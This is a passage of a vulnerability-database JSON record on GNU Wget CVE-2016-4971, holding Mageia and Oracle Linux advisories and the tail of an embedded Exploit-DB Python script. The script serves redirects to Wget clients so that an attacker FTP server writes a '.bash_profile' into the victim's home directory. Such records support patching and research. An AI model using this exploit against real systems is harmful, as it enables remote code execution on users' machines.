+ \" by GET :)\\n\")\r\n if \"Wget\" not in self.headers.get('User-Agent'):\r\n print(\"But it's not a Wget :( \\n\")\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n\r\n self.send_response(301)\r\n print(\"Uploading \" + str(FILE) + \"via ftp redirect vuln. It should land in /home/ \\n\")\r\n new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)\r\n\r\n print(\"Sending redirect to %s \\n\"%(new_path))\r\n self.send_header('Location', new_path)\r\n self.end_headers()\r\n\r\n\r\nHTTP_LISTEN_IP = '192.168.72.2'\r\nHTTP_LISTEN_PORT = 80\r\nFTP_HOST = '192.168.72.4'\r\nFTP_PORT = 2121\r\nFILE = '.bash_profile'\r\n\r\nhandler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n\r\nprint(\"Ready? Is your FTP server running?\")\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\r\nif result == 0:\r\n print(\"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT))\r\nelse:\r\n print(\"FTP is down :( Exiting.\")\r\n exit(1)\r\n\r\nprint(\"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT)\r\n\r\nhandler.serve_forever()", "sourceHref": "https://www.exploit-db.com/download/49815", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource (CVE-2016-4971). Fixed a potential race condition by creating files with .tmp ext and making them accessible to the current user only (CVE-2016-7098). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-09-28T05:59:24", "type": "mageia", "title": "Updated wget packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971", "CVE-2016-7098"], "modified": "2016-09-28T05:59:24", "id": "MGASA-2016-0323", "href": "https://advisories.mageia.org/MGASA-2016-0323.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2021-07-30T06:24:24", "description": "[1.14-13]\n- Fix CVE-2016-4971 (#1345778)\n- Added support for non-ASCII URLs (Related: CVE-2016-4971)\n[1.14-12]\n- Fix wget to include Host header on CONNECT as required by HTTP 1.1 (#1203384)\n- Run internal test suite during build (#1295846)\n- Fix -nv being documented as synonym for two options (#1147572)\n[1.14-11]\n- Fix CVE-2014-4877 wget: FTP symlink arbitrary filesystem access (#1156136)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-11-09T00:00:00", "type": "oraclelinux", "title": "wget security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4877", "CVE-2016-4971"], "modified": "2016-11-09T00:00:00", "id": "ELSA-2016-2587", "href": "http://linux.oracle.com/errata/ELSA-2016-2587.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution
